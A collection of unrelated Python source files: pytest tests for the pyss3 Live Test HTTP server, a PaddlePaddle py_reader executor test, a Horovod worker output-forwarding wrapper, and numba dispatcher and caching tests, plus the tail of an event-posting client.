except Queue.Empty:
break
assert events
return events
def _post_events_loop(self):
"""Send batched of events to server in a loop."""
logging.info('Starting events thread.')
while not self._exiting:
events = self._get_batch_of_events()
if events is None:
break
# pylint: disable=broad-except
try:
self._post_events_once(events)
except Exception:
logging.error('Exception sending events to server',
exc_info=sys.exc_info())
logging.info('Exiting events thread.')
def _post_events_once(self, events):
"""Send list of events to server."""
logging.info('Posting %d events to server', len(events))
try:
server_address = LOCAL_ADDRESS if self._args.local else APPENGINE_ADDRESS
self._make_request(server_address, EVENT_PATH,
method='POST', data=json.dumps(events))
except:
logging.error('Posting events failed', exc_info=sys.exc_info())
def stop(self):
"""Stop various threads and connections."""
self._exiting = True
self._events.put(None)
self._events_thread.join()
if self._args.local:
self._websocket_connection.close()
self._websocket_thread.join()
else:
self._pusher.disconnect()
|
test_server.py
|
# -*- coding: utf-8 -*-
"""Tests for pyss3.server."""
import pyss3.server as s
import threading
import argparse
import socket
import pytest
import pyss3
import json
import sys
from os import path
from pyss3 import SS3
from pyss3.util import Dataset, Print
HTTP_REQUEST = "%s %s HTTP/1.1\r\nContent-Length: %d\r\n\r\n%s"
RECV_BUFFER = 1024 * 1024 # 1MB
PYTHON3 = sys.version_info[0] >= 3
DATASET_FOLDER = "dataset"
DATASET_FOLDER_MR = "dataset_mr"
ADDRESS, PORT = "localhost", None
LT = s.Live_Test
dataset_path = path.join(path.abspath(path.dirname(__file__)), DATASET_FOLDER)
dataset_path_mr = path.join(path.abspath(path.dirname(__file__)), DATASET_FOLDER_MR)
x_train, y_train = None, None
clf = None
pyss3.set_verbosity(0)
x_train, y_train = Dataset.load_from_files(dataset_path_mr)
x_train, y_train = Dataset.load_from_files(dataset_path, folder_label=False)
clf = SS3()
clf.fit(x_train, y_train)
LT.serve() # no model error
LT.set_model(clf)
LT.get_port()
class MockCmdLineArgs:
"""Mocked command-line arguments."""
quiet = True
MODEL = "name"
path = dataset_path
label = 'folder'
port = 0
@pytest.fixture()
def mockers(mocker):
"""Set mockers up."""
mocker.patch.object(LT, "serve")
mocker.patch.object(SS3, "load_model")
mocker.patch.object(argparse.ArgumentParser, "add_argument")
mocker.patch.object(argparse.ArgumentParser,
"parse_args").return_value = MockCmdLineArgs
@pytest.fixture(params=[0, 1, 2, 3])
def test_case(request, mocker):
"""Argument values generator for test_live_test(test_case)."""
mocker.patch("webbrowser.open")
if request.param == 0:
LT.set_testset_from_files(dataset_path, folder_label=False)
elif request.param == 1:
LT.set_testset_from_files(dataset_path_mr, folder_label=True)
elif request.param == 2:
LT.set_testset(x_train, y_train)
else:
LT.__server_socket__ = None
yield request.param
def http_request(path, body='', get=False, as_bytes=False):
"""Create a basic HTTP request message."""
request = HTTP_REQUEST % ("GET" if get else "POST", path, len(body), body)
return request.encode() if as_bytes else request
def http_response_body(sock):
"""Return all HTTP message body."""
data = sock.recv(RECV_BUFFER).decode()
length = s.get_http_contlength(data)
body = s.get_http_body(data)
while len(body) < length and data:
data = sock.recv(RECV_BUFFER).decode()
body += data
return body # url_decode(body)
def send_http_request(path, body='', get=False, json_rsp=True):
"""Send an HTTP request to the Live Test Server."""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ADDRESS, PORT))
sock.sendall(http_request(path, body, get, as_bytes=True))
r = http_response_body(sock)
sock.close()
return json.loads(r) if json_rsp and r else r
def test_http_helper_functions():
"""Test for pyss3.server HTTP helper function."""
assert s.content_type("js") == "application/javascript"
assert s.content_type("non-existing") == "application/octet-stream"
request_path = "/the/path"
request_body = "the body"
assert s.parse_and_sanitize("../../a/path/../../")[0][-17:] == "a/path/index.html"
assert s.parse_and_sanitize("/")[0][-10:] == "index.html"
assert s.get_http_path(http_request(request_path)) == request_path
assert s.get_http_body(http_request("", request_body)) == request_body
assert s.get_http_contlength(http_request("", request_body)) == len(request_body)
def test_live_test(test_case):
"""Test the HTTP Live Test Server."""
global PORT
if test_case != 3:
PORT = LT.start_listening()
else:
Print.error = lambda _: None # do nothing
serve_args = {
"x_test": x_train if test_case == 2 or test_case == 3 else None,
"y_test": y_train if test_case == 2 else None,
"quiet": test_case != 0
}
if PYTHON3:
threading.Thread(target=LT.serve, kwargs=serve_args, daemon=True).start()
else:
return
# threading.Thread(target=LT.serve, kwargs=serve_args).start()
if test_case == 3:
return
# empty message
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ADDRESS, PORT))
sock.sendall(b'')
sock.close()
# decode error
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ADDRESS, PORT))
sock.sendall(b'\x01\x0E\xFF\xF0\x02\x0F\xE1')
sock.close()
# 404 error
send_http_request("/404")
# ack
send_http_request("/ack")
# get_info
r = send_http_request("/get_info")
assert r["model_name"] == clf.get_name()
cats = r["categories"]
docs = r["docs"]
assert len(cats) == 8 + 1
# assert len(docs) == len(cats) - 1
# assert len(docs[cats[0]]["path"]) == 100
# classify
r = send_http_request(
"/classify",
"this is an android mobile " * (1024 * 4 if test_case == 0 else 1)
)
assert r["ci"][r["cvns"][0][0]] == "science&technology"
# get_doc
for c in docs:
r = send_http_request("/get_doc", docs[c]["path"][1])
assert len(r["content"][:2]) == 2
# GET 404
send_http_request("/404", get=True, json_rsp=False)
# GET index.html
r = send_http_request("/", get=True, json_rsp=False)
assert "<html>" in r
def test_main(mockers):
"""Test the main() function."""
if not PYTHON3:
return
s.main()
|
test_py_reader_using_executor.py
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import paddle.fluid as fluid
import paddle.fluid.core as core
import numpy as np
import threading
import multiprocessing
import os
def as_tensor(np_array_or_tensor, place=None):
if isinstance(np_array_or_tensor, fluid.LoDTensor):
return np_array_or_tensor
if place is None:
place = fluid.CPUPlace()
tensor = fluid.LoDTensor()
tensor.set(np_array_or_tensor, place)
return tensor
def as_numpy(tensor_or_numpy):
return tensor_or_numpy if isinstance(
tensor_or_numpy, np.ndarray) else np.array(tensor_or_numpy)
def feed_data(feed_queue, reader):
data_generator = reader()
while True:
data = next(data_generator, None)
if data is None or not feed_queue.push(data):
break
def simple_fc_net(in_size,
class_num,
hidden_sizes,
batch_size,
queue_capacity,
use_double_buffer=False,
use_feed_list=True):
if use_feed_list:
data = fluid.layers.data(name="data", dtype='float32', shape=[in_size])
label = fluid.layers.data(name='label', dtype='int64', shape=[1])
py_reader = fluid.layers.create_py_reader_by_data(
capacity=queue_capacity,
use_double_buffer=False,
feed_list=[data, label])
else:
py_reader = fluid.layers.py_reader(
capacity=queue_capacity,
shapes=[[-1, in_size], [-1, 1]],
lod_levels=[0, 0],
dtypes=['float32', 'int64'],
use_double_buffer=False)
feed_queue = py_reader.queue
reader = fluid.layers.batch(py_reader, batch_size=batch_size)
if use_double_buffer:
reader = fluid.layers.double_buffer(reader)
in_data, label = fluid.layers.read_file(reader)
hidden = in_data
for hidden_size in hidden_sizes:
hidden = fluid.layers.fc(
hidden,
size=hidden_size,
act='tanh',
bias_attr=fluid.ParamAttr(
initializer=fluid.initializer.Constant(value=1.0)))
predict_label = fluid.layers.fc(hidden, size=class_num, act='softmax')
loss = fluid.layers.mean(
fluid.layers.cross_entropy(
input=predict_label, label=label))
optimizer = fluid.optimizer.Adam()
optimizer.minimize(loss)
return in_data, label, loss, optimizer, feed_queue, py_reader
class TestPyReaderUsingExecutor(unittest.TestCase):
def setUp(self):
self.in_size = 1000
self.hidden_sizes = [50, 30, 20]
self.class_num = 10
self.batch_size = 32
self.iterations = 10
self.queue_capacity = 50
def test(self):
for use_cuda in ([False, True]
if core.is_compiled_with_cuda() else [False]):
for use_parallel_executor in [False, True]:
for use_double_buffer in [False, True]:
for use_feed_list in [False, True]:
for use_decorate_paddle_reader in [False, True]:
print('Test Parameters:'),
print({
'use_cuda': use_cuda,
'use_parallel_executor': use_parallel_executor,
'use_double_buffer': use_double_buffer,
'use_feed_list': use_feed_list,
'use_decorate_paddle_reader':
use_decorate_paddle_reader
})
self.main(use_cuda, use_parallel_executor,
use_double_buffer, use_feed_list,
use_decorate_paddle_reader)
def tensor_reader(self, use_decorate_paddle_reader):
def reader():
self.inputs = []
cnt = 0
while True:
tensors = fluid.LoDTensorArray()
in_data = np.random.uniform(
low=0, high=1, size=(1, self.in_size)).astype('float32')
tensors.append(as_tensor(in_data))
label = np.random.random_integers(
low=0, high=self.class_num - 1, size=(1, 1)).astype('int64')
tensors.append(as_tensor(label))
if cnt < self.iterations * self.batch_size * self.batch_size_times:
if cnt % (self.batch_size * self.batch_size_times) == 0:
self.inputs.append([in_data, label])
else:
self.inputs[-1][0] = np.concatenate(
(self.inputs[-1][0], in_data), axis=0)
self.inputs[-1][1] = np.concatenate(
(self.inputs[-1][1], label), axis=0)
elif not self.use_double_buffer:
break
if use_decorate_paddle_reader:
yield [(in_data, label)]
else:
yield tensors
cnt += 1
if not use_decorate_paddle_reader:
yield None
return reader
def main(self,
use_cuda=True,
use_parallel_executor=False,
use_double_buffer=False,
use_feed_list=False,
use_decorate_paddle_reader=False):
assert not use_cuda or use_cuda and core.is_compiled_with_cuda()
self.use_cuda = use_cuda
self.use_parallel_executor = use_parallel_executor
self.use_double_buffer = use_double_buffer
self.use_feed_list = use_feed_list
self.use_decorate_paddle_reader = use_decorate_paddle_reader
startup_program = fluid.Program()
main_program = fluid.Program()
with fluid.program_guard(main_program, startup_program):
in_data, label, loss, optimizer, feed_queue, py_reader = simple_fc_net(
in_size=self.in_size,
class_num=self.class_num,
hidden_sizes=self.hidden_sizes,
batch_size=self.batch_size,
queue_capacity=self.queue_capacity,
use_double_buffer=self.use_double_buffer,
use_feed_list=self.use_feed_list)
place = fluid.CUDAPlace(0) if use_cuda else fluid.CPUPlace()
startup_exe = fluid.Executor(place)
startup_exe.run(startup_program)
if use_parallel_executor:
main_exe = fluid.ParallelExecutor(use_cuda, loss_name=loss.name)
if use_cuda:
self.batch_size_times = core.get_cuda_device_count()
else:
self.batch_size_times = int(
os.environ.get('CPU_NUM', multiprocessing.cpu_count()))
else:
main_exe = startup_exe
self.batch_size_times = 1
reader = self.tensor_reader(use_decorate_paddle_reader)
if use_decorate_paddle_reader:
py_reader.decorate_paddle_reader(reader)
py_reader.start()
else:
thread = threading.Thread(
target=feed_data, args=(feed_queue, reader))
thread.daemon = True
thread.start()
self.outputs = []
for _ in range(self.iterations):
fetches = main_exe.run(fetch_list=[in_data.name, label.name])
fetches = [as_numpy(fetch) for fetch in fetches]
self.outputs.append(fetches)
feed_queue.close()
self.validate()
if use_decorate_paddle_reader:
py_reader.exited = True
py_reader.thread.join()
else:
thread.join()
def validate(self):
self.assertEqual(len(self.inputs), len(self.outputs))
for batch_in, batch_out in zip(self.inputs, self.outputs):
self.assertEqual(len(batch_in), len(batch_out))
if self.use_parallel_executor and not self.use_double_buffer:
self.validate_unordered_batch(batch_in, batch_out)
else:
for in_data, out_data in zip(batch_in, batch_out):
self.assertEqual(in_data.shape, out_data.shape)
if not self.use_parallel_executor:
self.assertTrue((in_data == out_data).all())
def validate_unordered_batch(self, batch_in, batch_out):
out_index_left_set = set(range(self.batch_size * self.batch_size_times))
mapping_num = 0
for i in range(self.batch_size * self.batch_size_times):
for j in out_index_left_set:
flag = True
for k in range(len(batch_in)):
in_data = batch_in[k][i]
out_data = batch_out[k][j]
if (in_data != out_data).any():
flag = False
break
if flag:
out_index_left_set.remove(j)
mapping_num += 1
break
self.assertEqual(mapping_num, self.batch_size * self.batch_size_times)
if __name__ == '__main__':
unittest.main()
|
worker_process_wrapper.py
|
"""
worker_process_wrapper.py is the entrypoint for Horovod worker processes.
It exists to redirect stdout/stderr to the docker logging without needing
to package a shell script.
"""
import os
import subprocess
import sys
import threading
from typing import BinaryIO, List
from determined import constants
def forward_stream(src_stream: BinaryIO, dst_stream: BinaryIO, rank: str) -> None:
for line in iter(src_stream.readline, b""):
line = f"[rank={rank}] ".encode() + line
os.write(dst_stream.fileno(), line)
def run_all(ts: List[threading.Thread]) -> None:
for t in ts:
t.start()
for t in ts:
t.join()
def main() -> int:
rank = os.environ.get("HOROVOD_RANK")
proc = subprocess.Popen(sys.argv[1:], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
with open(constants.CONTAINER_STDOUT, "w") as cstdout, open(
constants.CONTAINER_STDERR, "w"
) as cstderr, proc:
run_all(
[
threading.Thread(target=forward_stream, args=(proc.stdout, cstdout, rank)),
threading.Thread(target=forward_stream, args=(proc.stderr, cstderr, rank)),
]
)
return proc.returncode
if __name__ == "__main__":
sys.exit(main())
|
test_dispatcher.py
|
from __future__ import print_function, division, absolute_import
import errno
import multiprocessing
import os
import shutil
import subprocess
import sys
import threading
import warnings
import numpy as np
from numba import unittest_support as unittest
from numba import utils, jit, generated_jit, types, typeof
from numba import _dispatcher
from numba.errors import NumbaWarning
from .support import TestCase, tag, temp_directory, import_dynamic
def dummy(x):
return x
def add(x, y):
return x + y
def addsub(x, y, z):
return x - y + z
def addsub_defaults(x, y=2, z=3):
return x - y + z
def star_defaults(x, y=2, *z):
return x, y, z
def generated_usecase(x, y=5):
if isinstance(x, types.Complex):
def impl(x, y):
return x + y
else:
def impl(x, y):
return x - y
return impl
def bad_generated_usecase(x, y=5):
if isinstance(x, types.Complex):
def impl(x):
return x
else:
def impl(x, y=6):
return x - y
return impl
class BaseTest(TestCase):
jit_args = dict(nopython=True)
def compile_func(self, pyfunc):
def check(*args, **kwargs):
expected = pyfunc(*args, **kwargs)
result = f(*args, **kwargs)
self.assertPreciseEqual(result, expected)
f = jit(**self.jit_args)(pyfunc)
return f, check
class TestDispatcher(BaseTest):
def test_dyn_pyfunc(self):
@jit
def foo(x):
return x
foo(1)
[cr] = foo.overloads.values()
# __module__ must be match that of foo
self.assertEqual(cr.entry_point.__module__, foo.py_func.__module__)
def test_no_argument(self):
@jit
def foo():
return 1
# Just make sure this doesn't crash
foo()
def test_coerce_input_types(self):
# Issue #486: do not allow unsafe conversions if we can still
# compile other specializations.
c_add = jit(nopython=True)(add)
self.assertPreciseEqual(c_add(123, 456), add(123, 456))
self.assertPreciseEqual(c_add(12.3, 45.6), add(12.3, 45.6))
self.assertPreciseEqual(c_add(12.3, 45.6j), add(12.3, 45.6j))
self.assertPreciseEqual(c_add(12300000000, 456), add(12300000000, 456))
# Now force compilation of only a single specialization
c_add = jit('(i4, i4)', nopython=True)(add)
self.assertPreciseEqual(c_add(123, 456), add(123, 456))
# Implicit (unsafe) conversion of float to int
self.assertPreciseEqual(c_add(12.3, 45.6), add(12, 45))
with self.assertRaises(TypeError):
# Implicit conversion of complex to int disallowed
c_add(12.3, 45.6j)
def test_ambiguous_new_version(self):
"""Test compiling new version in an ambiguous case
"""
@jit
def foo(a, b):
return a + b
INT = 1
FLT = 1.5
self.assertAlmostEqual(foo(INT, FLT), INT + FLT)
self.assertEqual(len(foo.overloads), 1)
self.assertAlmostEqual(foo(FLT, INT), FLT + INT)
self.assertEqual(len(foo.overloads), 2)
self.assertAlmostEqual(foo(FLT, FLT), FLT + FLT)
self.assertEqual(len(foo.overloads), 3)
# The following call is ambiguous because (int, int) can resolve
# to (float, int) or (int, float) with equal weight.
self.assertAlmostEqual(foo(1, 1), INT + INT)
self.assertEqual(len(foo.overloads), 4, "didn't compile a new "
"version")
def test_lock(self):
"""
Test that (lazy) compiling from several threads at once doesn't
produce errors (see issue #908).
"""
errors = []
@jit
def foo(x):
return x + 1
def wrapper():
try:
self.assertEqual(foo(1), 2)
except BaseException as e:
errors.append(e)
threads = [threading.Thread(target=wrapper) for i in range(16)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertFalse(errors)
def test_explicit_signatures(self):
f = jit("(int64,int64)")(add)
# Approximate match (unsafe conversion)
self.assertPreciseEqual(f(1.5, 2.5), 3)
self.assertEqual(len(f.overloads), 1, f.overloads)
f = jit(["(int64,int64)", "(float64,float64)"])(add)
# Exact signature matches
self.assertPreciseEqual(f(1, 2), 3)
self.assertPreciseEqual(f(1.5, 2.5), 4.0)
# Approximate match (int32 -> float64 is a safe conversion)
self.assertPreciseEqual(f(np.int32(1), 2.5), 3.5)
# No conversion
with self.assertRaises(TypeError) as cm:
f(1j, 1j)
self.assertIn("No matching definition", str(cm.exception))
self.assertEqual(len(f.overloads), 2, f.overloads)
# A more interesting one...
f = jit(["(float32,float32)", "(float64,float64)"])(add)
self.assertPreciseEqual(f(np.float32(1), np.float32(2**-25)), 1.0)
self.assertPreciseEqual(f(1, 2**-25), 1.0000000298023224)
# Fail to resolve ambiguity between the two best overloads
f = jit(["(float32,float64)",
"(float64,float32)",
"(int64,int64)"])(add)
with self.assertRaises(TypeError) as cm:
f(1.0, 2.0)
# The two best matches are output in the error message, as well
# as the actual argument types.
self.assertRegexpMatches(
str(cm.exception),
r"Ambiguous overloading for <function add [^>]*> \(float64, float64\):\n"
r"\(float32, float64\) -> float64\n"
r"\(float64, float32\) -> float64"
)
# The integer signature is not part of the best matches
self.assertNotIn("int64", str(cm.exception))
def test_signature_mismatch(self):
tmpl = "Signature mismatch: %d argument types given, but function takes 2 arguments"
with self.assertRaises(TypeError) as cm:
jit("()")(add)
self.assertIn(tmpl % 0, str(cm.exception))
with self.assertRaises(TypeError) as cm:
jit("(intc,)")(add)
self.assertIn(tmpl % 1, str(cm.exception))
with self.assertRaises(TypeError) as cm:
jit("(intc,intc,intc)")(add)
self.assertIn(tmpl % 3, str(cm.exception))
# With forceobj=True, an empty tuple is accepted
jit("()", forceobj=True)(add)
with self.assertRaises(TypeError) as cm:
jit("(intc,)", forceobj=True)(add)
self.assertIn(tmpl % 1, str(cm.exception))
def test_matching_error_message(self):
f = jit("(intc,intc)")(add)
with self.assertRaises(TypeError) as cm:
f(1j, 1j)
self.assertEqual(str(cm.exception),
"No matching definition for argument type(s) "
"complex128, complex128")
def test_disabled_compilation(self):
@jit
def foo(a):
return a
foo.compile("(float32,)")
foo.disable_compile()
with self.assertRaises(RuntimeError) as raises:
foo.compile("(int32,)")
self.assertEqual(str(raises.exception), "compilation disabled")
self.assertEqual(len(foo.signatures), 1)
def test_disabled_compilation_through_list(self):
@jit(["(float32,)", "(int32,)"])
def foo(a):
return a
with self.assertRaises(RuntimeError) as raises:
foo.compile("(complex64,)")
self.assertEqual(str(raises.exception), "compilation disabled")
self.assertEqual(len(foo.signatures), 2)
def test_disabled_compilation_nested_call(self):
@jit(["(intp,)"])
def foo(a):
return a
@jit
def bar():
foo(1)
foo(np.ones(1)) # no matching definition
with self.assertRaises(TypeError) as raises:
bar()
m = "No matching definition for argument type(s) array(float64, 1d, C)"
self.assertEqual(str(raises.exception), m)
def test_fingerprint_failure(self):
"""
Failure in computing the fingerprint cannot affect a nopython=False
function. On the other hand, with nopython=True, a ValueError should
be raised to report the failure with fingerprint.
"""
@jit
def foo(x):
return x
# Empty list will trigger failure in compile_fingerprint
errmsg = 'cannot compute fingerprint of empty list'
with self.assertRaises(ValueError) as raises:
_dispatcher.compute_fingerprint([])
self.assertIn(errmsg, str(raises.exception))
# It should work in fallback
self.assertEqual(foo([]), [])
# But, not in nopython=True
strict_foo = jit(nopython=True)(foo.py_func)
with self.assertRaises(ValueError) as raises:
strict_foo([])
self.assertIn(errmsg, str(raises.exception))
# Test in loop lifting context
@jit
def bar():
object() # force looplifting
x = []
for i in range(10):
x = foo(x)
return x
self.assertEqual(bar(), [])
# Make sure it was looplifted
[cr] = bar.overloads.values()
self.assertEqual(len(cr.lifted), 1)
class TestSignatureHandling(BaseTest):
"""
Test support for various parameter passing styles.
"""
@tag('important')
def test_named_args(self):
"""
Test passing named arguments to a dispatcher.
"""
f, check = self.compile_func(addsub)
check(3, z=10, y=4)
check(3, 4, 10)
check(x=3, y=4, z=10)
# All calls above fall under the same specialization
self.assertEqual(len(f.overloads), 1)
# Errors
with self.assertRaises(TypeError) as cm:
f(3, 4, y=6, z=7)
self.assertIn("too many arguments: expected 3, got 4",
str(cm.exception))
with self.assertRaises(TypeError) as cm:
f()
self.assertIn("not enough arguments: expected 3, got 0",
str(cm.exception))
with self.assertRaises(TypeError) as cm:
f(3, 4, y=6)
self.assertIn("missing argument 'z'", str(cm.exception))
def test_default_args(self):
"""
Test omitting arguments with a default value.
"""
f, check = self.compile_func(addsub_defaults)
check(3, z=10, y=4)
check(3, 4, 10)
check(x=3, y=4, z=10)
# Now omitting some values
check(3, z=10)
check(3, 4)
check(x=3, y=4)
check(3)
check(x=3)
# Errors
with self.assertRaises(TypeError) as cm:
f(3, 4, y=6, z=7)
self.assertIn("too many arguments: expected 3, got 4",
str(cm.exception))
with self.assertRaises(TypeError) as cm:
f()
self.assertIn("not enough arguments: expected at least 1, got 0",
str(cm.exception))
with self.assertRaises(TypeError) as cm:
f(y=6, z=7)
self.assertIn("missing argument 'x'", str(cm.exception))
def test_star_args(self):
"""
Test a compiled function with starargs in the signature.
"""
f, check = self.compile_func(star_defaults)
check(4)
check(4, 5)
check(4, 5, 6)
check(4, 5, 6, 7)
check(4, 5, 6, 7, 8)
check(x=4)
check(x=4, y=5)
check(4, y=5)
with self.assertRaises(TypeError) as cm:
f(4, 5, y=6)
self.assertIn("some keyword arguments unexpected", str(cm.exception))
with self.assertRaises(TypeError) as cm:
f(4, 5, z=6)
self.assertIn("some keyword arguments unexpected", str(cm.exception))
with self.assertRaises(TypeError) as cm:
f(4, x=6)
self.assertIn("some keyword arguments unexpected", str(cm.exception))
class TestSignatureHandlingObjectMode(TestSignatureHandling):
"""
Sams as TestSignatureHandling, but in object mode.
"""
jit_args = dict(forceobj=True)
class TestGeneratedDispatcher(TestCase):
"""
Tests for @generated_jit.
"""
@tag('important')
def test_generated(self):
f = generated_jit(nopython=True)(generated_usecase)
self.assertEqual(f(8), 8 - 5)
self.assertEqual(f(x=8), 8 - 5)
self.assertEqual(f(x=8, y=4), 8 - 4)
self.assertEqual(f(1j), 5 + 1j)
self.assertEqual(f(1j, 42), 42 + 1j)
self.assertEqual(f(x=1j, y=7), 7 + 1j)
def test_signature_errors(self):
"""
Check error reporting when implementation signature doesn't match
generating function signature.
"""
f = generated_jit(nopython=True)(bad_generated_usecase)
# Mismatching # of arguments
with self.assertRaises(TypeError) as raises:
f(1j)
self.assertIn("should be compatible with signature '(x, y=5)', but has signature '(x)'",
str(raises.exception))
# Mismatching defaults
with self.assertRaises(TypeError) as raises:
f(1)
self.assertIn("should be compatible with signature '(x, y=5)', but has signature '(x, y=6)'",
str(raises.exception))
class TestDispatcherMethods(TestCase):
def test_recompile(self):
closure = 1
@jit
def foo(x):
return x + closure
self.assertPreciseEqual(foo(1), 2)
self.assertPreciseEqual(foo(1.5), 2.5)
self.assertEqual(len(foo.signatures), 2)
closure = 2
self.assertPreciseEqual(foo(1), 2)
# Recompiling takes the new closure into account.
foo.recompile()
# Everything was recompiled
self.assertEqual(len(foo.signatures), 2)
self.assertPreciseEqual(foo(1), 3)
self.assertPreciseEqual(foo(1.5), 3.5)
def test_recompile_signatures(self):
# Same as above, but with an explicit signature on @jit.
closure = 1
@jit("int32(int32)")
def foo(x):
return x + closure
self.assertPreciseEqual(foo(1), 2)
self.assertPreciseEqual(foo(1.5), 2)
closure = 2
self.assertPreciseEqual(foo(1), 2)
# Recompiling takes the new closure into account.
foo.recompile()
self.assertPreciseEqual(foo(1), 3)
self.assertPreciseEqual(foo(1.5), 3)
@tag('important')
def test_inspect_llvm(self):
# Create a jited function
@jit
def foo(explicit_arg1, explicit_arg2):
return explicit_arg1 + explicit_arg2
# Call it in a way to create 3 signatures
foo(1, 1)
foo(1.0, 1)
foo(1.0, 1.0)
# base call to get all llvm in a dict
llvms = foo.inspect_llvm()
self.assertEqual(len(llvms), 3)
# make sure the function name shows up in the llvm
for llvm_bc in llvms.values():
# Look for the function name
self.assertIn("foo", llvm_bc)
# Look for the argument names
self.assertIn("explicit_arg1", llvm_bc)
self.assertIn("explicit_arg2", llvm_bc)
def test_inspect_asm(self):
# Create a jited function
@jit
def foo(explicit_arg1, explicit_arg2):
return explicit_arg1 + explicit_arg2
# Call it in a way to create 3 signatures
foo(1, 1)
foo(1.0, 1)
foo(1.0, 1.0)
# base call to get all llvm in a dict
asms = foo.inspect_asm()
self.assertEqual(len(asms), 3)
# make sure the function name shows up in the llvm
for asm in asms.values():
# Look for the function name
self.assertTrue("foo" in asm)
def test_inspect_cfg(self):
# Exercise the .inspect_cfg(). These are minimal tests and does not
# fully checks the correctness of the function.
@jit
def foo(the_array):
return the_array.sum()
# Generate 3 overloads
a1 = np.ones(1)
a2 = np.ones((1, 1))
a3 = np.ones((1, 1, 1))
foo(a1)
foo(a2)
foo(a3)
# Call inspect_cfg() without arguments
cfgs = foo.inspect_cfg()
# Correct count of overloads
self.assertEqual(len(cfgs), 3)
# Makes sure all the signatures are correct
[s1, s2, s3] = cfgs.keys()
self.assertEqual(set([s1, s2, s3]),
set(map(lambda x: (typeof(x),), [a1, a2, a3])))
def check_display(cfg, wrapper=''):
# simple stringify test
if wrapper:
wrapper = "{}{}".format(len(wrapper), wrapper)
prefix = r'^digraph "CFG for \'_ZN{}5numba'.format(wrapper)
self.assertRegexpMatches(str(cfg), prefix)
# .display() requires an optional dependency on `graphviz`.
# just test for the attribute without running it.
self.assertTrue(callable(cfg.display))
for cfg in cfgs.values():
check_display(cfg)
self.assertEqual(len(list(cfgs.values())), 3)
# Call inspect_cfg(signature)
cfg = foo.inspect_cfg(signature=foo.signatures[0])
check_display(cfg)
# Call inspect_cfg(signature, show_wrapper="python")
cfg = foo.inspect_cfg(signature=foo.signatures[0],
show_wrapper="python")
check_display(cfg, wrapper='cpython')
def test_inspect_types(self):
@jit
def foo(a, b):
return a + b
foo(1, 2)
# Exercise the method
foo.inspect_types(utils.StringIO())
def test_issue_with_array_layout_conflict(self):
"""
This test an issue with the dispatcher when an array that is both
C and F contiguous is supplied as the first signature.
The dispatcher checks for F contiguous first but the compiler checks
for C contiguous first. This results in an C contiguous code inserted
as F contiguous function.
"""
def pyfunc(A, i, j):
return A[i, j]
cfunc = jit(pyfunc)
ary_c_and_f = np.array([[1.]])
ary_c = np.array([[0., 1.], [2., 3.]], order='C')
ary_f = np.array([[0., 1.], [2., 3.]], order='F')
exp_c = pyfunc(ary_c, 1, 0)
exp_f = pyfunc(ary_f, 1, 0)
self.assertEqual(1., cfunc(ary_c_and_f, 0, 0))
got_c = cfunc(ary_c, 1, 0)
got_f = cfunc(ary_f, 1, 0)
self.assertEqual(exp_c, got_c)
self.assertEqual(exp_f, got_f)
class BaseCacheTest(TestCase):
# This class is also used in test_cfunc.py.
# The source file that will be copied
usecases_file = None
# Make sure this doesn't conflict with another module
modname = None
def setUp(self):
self.tempdir = temp_directory('test_cache')
sys.path.insert(0, self.tempdir)
self.modfile = os.path.join(self.tempdir, self.modname + ".py")
self.cache_dir = os.path.join(self.tempdir, "__pycache__")
shutil.copy(self.usecases_file, self.modfile)
self.maxDiff = None
def tearDown(self):
sys.modules.pop(self.modname, None)
sys.path.remove(self.tempdir)
def import_module(self):
# Import a fresh version of the test module. All jitted functions
# in the test module will start anew and load overloads from
# the on-disk cache if possible.
old = sys.modules.pop(self.modname, None)
if old is not None:
# Make sure cached bytecode is removed
if sys.version_info >= (3,):
cached = [old.__cached__]
else:
if old.__file__.endswith(('.pyc', '.pyo')):
cached = [old.__file__]
else:
cached = [old.__file__ + 'c', old.__file__ + 'o']
for fn in cached:
try:
os.unlink(fn)
except OSError as e:
if e.errno != errno.ENOENT:
raise
mod = import_dynamic(self.modname)
self.assertEqual(mod.__file__.rstrip('co'), self.modfile)
return mod
def cache_contents(self):
try:
return [fn for fn in os.listdir(self.cache_dir)
if not fn.endswith(('.pyc', ".pyo"))]
except OSError as e:
if e.errno != errno.ENOENT:
raise
return []
def get_cache_mtimes(self):
return dict((fn, os.path.getmtime(os.path.join(self.cache_dir, fn)))
for fn in sorted(self.cache_contents()))
def check_pycache(self, n):
c = self.cache_contents()
self.assertEqual(len(c), n, c)
def dummy_test(self):
pass
class TestCache(BaseCacheTest):
here = os.path.dirname(__file__)
usecases_file = os.path.join(here, "cache_usecases.py")
modname = "dispatcher_caching_test_fodder"
def run_in_separate_process(self):
# Cached functions can be run from a distinct process.
# Also stresses issue #1603: uncached function calling cached function
# shouldn't fail compiling.
code = """if 1:
import sys
sys.path.insert(0, %(tempdir)r)
mod = __import__(%(modname)r)
mod.self_test()
""" % dict(tempdir=self.tempdir, modname=self.modname)
popen = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = popen.communicate()
if popen.returncode != 0:
raise AssertionError("process failed with code %s: stderr follows\n%s\n"
% (popen.returncode, err.decode()))
def check_module(self, mod):
self.check_pycache(0)
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(2) # 1 index, 1 data
self.assertPreciseEqual(f(2.5, 3), 6.5)
self.check_pycache(3) # 1 index, 2 data
f = mod.add_objmode_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(5) # 2 index, 3 data
self.assertPreciseEqual(f(2.5, 3), 6.5)
self.check_pycache(6) # 2 index, 4 data
mod.self_test()
def check_hits(self, func, hits, misses=None):
st = func.stats
self.assertEqual(sum(st.cache_hits.values()), hits, st.cache_hits)
if misses is not None:
self.assertEqual(sum(st.cache_misses.values()), misses,
st.cache_misses)
@tag('important')
def test_caching(self):
